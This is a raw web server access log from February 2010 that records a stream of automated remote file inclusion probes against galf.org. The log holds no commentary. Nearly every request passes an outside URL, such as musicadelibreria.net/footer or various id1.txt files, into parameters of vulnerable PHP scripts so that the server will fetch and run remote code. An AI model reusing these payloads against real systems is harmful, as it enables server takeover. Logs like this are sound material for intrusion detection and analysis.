203.115.131.17 - - [01/Feb/2010:03:47:54 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:54 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:54 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:54 -0800] "GET /logs/access_100118.log///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:54 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:54 -0800] "GET /logs/access_100118.log///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:54 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:54 -0800] "GET /logs/access_100118.log///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:47:54 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [01/Feb/2010:03:49:15 -0800] "GET /logs/access_090803.log//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [01/Feb/2010:03:49:15 -0800] "GET /logs//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [01/Feb/2010:03:49:15 -0800] "GET /delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [01/Feb/2010:03:49:17 -0800] "GET /logs/access_090720.log//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [01/Feb/2010:03:49:17 -0800] "GET /logs//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [01/Feb/2010:03:49:17 -0800] "GET /delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:49:40 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:49:40 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:49:40 -0800] "GET /logs/access_091123.log///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [01/Feb/2010:03:50:07 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:50:12 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:50:12 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:50:12 -0800] "GET /logs/access_091123.log///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:50:20 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:50:20 -0800] "GET /logs/access_091123.log///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:50:20 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [01/Feb/2010:03:51:19 -0800] "GET /delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [01/Feb/2010:03:51:19 -0800] "GET /logs//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [01/Feb/2010:03:51:24 -0800] "GET /logs/access_090803.log//delete_all.php?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.46.199.190 - - [01/Feb/2010:03:52:27 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:48 -0800] "GET /logs/access_090713.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:49 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:49 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:49 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:49 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:50 -0800] "GET /logs/access_090713.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:51 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:51 -0800] "GET /logs/access_090713.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:51 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:57 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:57 -0800] "GET /logs/access_090713.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:57 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:58 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:59 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:59 -0800] "GET /logs/access_090713.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:59 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:59 -0800] "GET /logs/access_090720.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:59 -0800] "GET /logs/access_090720.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:59 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:59 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:59 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:59 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:59 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:53:59 -0800] "GET /logs/access_090720.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:00 -0800] "GET /logs/access_090713.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:00 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:00 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:04 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:04 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:04 -0800] "GET /logs/access_090720.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:04 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:04 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:04 -0800] "GET /logs/access_090720.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:20 -0800] "GET /logs/access_090713.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:20 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:20 -0800] "GET /logs/access_090720.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:20 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:29 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:29 -0800] "GET /logs/access_090713.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:29 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:29 -0800] "GET /logs/access_090713.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:31 -0800] "GET /logs/access.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:32 -0800] "GET /logs/access.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:32 -0800] "GET /logs/access.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:41 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:41 -0800] "GET /logs/access_090713.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:41 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:54:42 -0800] "GET /logs/access_090713.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:55:06 -0800] "GET ///_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:55:07 -0800] "GET /logs////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:03:55:07 -0800] "GET /logs/access_090713.log////_test_holidays.php?APB_rp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:56:28 -0800] "GET /logs/access.log/////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:56:28 -0800] "GET /logs/////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:56:28 -0800] "GET ////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:56:39 -0800] "GET /poweredbywpmu//wp-pass.php?_wp_http_referer=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:56:39 -0800] "GET /logs/poweredbywpmu//wp-pass.php?_wp_http_referer=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:56:39 -0800] "GET /logs/access_091109.log%20%20/poweredbywpmu//wp-pass.php?_wp_http_referer=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:03:56:49 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:03:56:49 -0800] "GET /?sourcedir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:03:56:49 -0800] "GET /logs/?sourcedir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:03:57:08 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:58:14 -0800] "GET /logs/poweredbywpmu//wp-pass.php?_wp_http_referer=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:58:15 -0800] "GET /poweredbywpmu//wp-pass.php?_wp_http_referer=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:58:15 -0800] "GET /logs/access_091109.log/poweredbywpmu//wp-pass.php?_wp_http_referer=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:03:59:17 -0800] "GET /logs/access_091109.log/poweredbywpmu//wp-pass.php?_wp_http_referer=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:04:01:05 -0800] "GET /index.php?option=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:04:01:10 -0800] "GET /logs//index.php?option=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:04:01:10 -0800] "GET /logs/access_091123.log//index.php?option=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:01:34 -0800] "GET /logs/access.log%20%20/////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.174.53 - - [01/Feb/2010:04:01:41 -0800] "GET /logs/access_091019.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.174.53 - - [01/Feb/2010:04:01:41 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.174.53 - - [01/Feb/2010:04:01:44 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:02:01 -0800] "GET /logs/access_091207.log/poweredbywpmu//wp-pass.php?_wp_http_referer=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:02:37 -0800] "GET /logs/access_091109.log%20%20/poweredbywpmu//wp-pass.php?_wp_http_referer=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:04:49 -0800] "GET /logs/access_091207.log/poweredbywpmu//wp-pass.php?_wp_http_referer=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:04:08:30 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:04:08:30 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:04:08:30 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:04:08:30 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:04:09:15 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:04:09:16 -0800] "GET /logs/access_090824.log/?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:04:09:16 -0800] "GET /logs/access_090706.log/?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:04:09:16 -0800] "GET /?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:04:09:16 -0800] "GET /logs/access_091012.log/?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:04:09:20 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:04:09:20 -0800] "GET /logs/access_091012.log/?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:04:09:20 -0800] "GET /?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:04:09:20 -0800] "GET /logs/access_090824.log/?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:04:09:20 -0800] "GET /logs/access_090720.log//include/mail.inc.php?skin_board_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:04:09:20 -0800] "GET /logs/access_090706.log/?DOCUMENT_ROOT=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:04:09:20 -0800] "GET /include/mail.inc.php?skin_board_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:04:09:20 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:04:09:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "galf.org"
94.124.120.47 - - [01/Feb/2010:04:09:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "galf.org"
94.124.120.47 - - [01/Feb/2010:04:09:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "galf.org"
94.124.120.47 - - [01/Feb/2010:04:09:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "galf.org"
121.88.4.141 - - [01/Feb/2010:04:11:10 -0800] "GET /logs/access_100125.log%20%20/////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:04:11:17 -0800] "GET /include/mail.inc.php?skin_board_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:04:11:17 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:04:11:17 -0800] "GET /logs/access_090720.log%20%20//include/mail.inc.php?skin_board_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
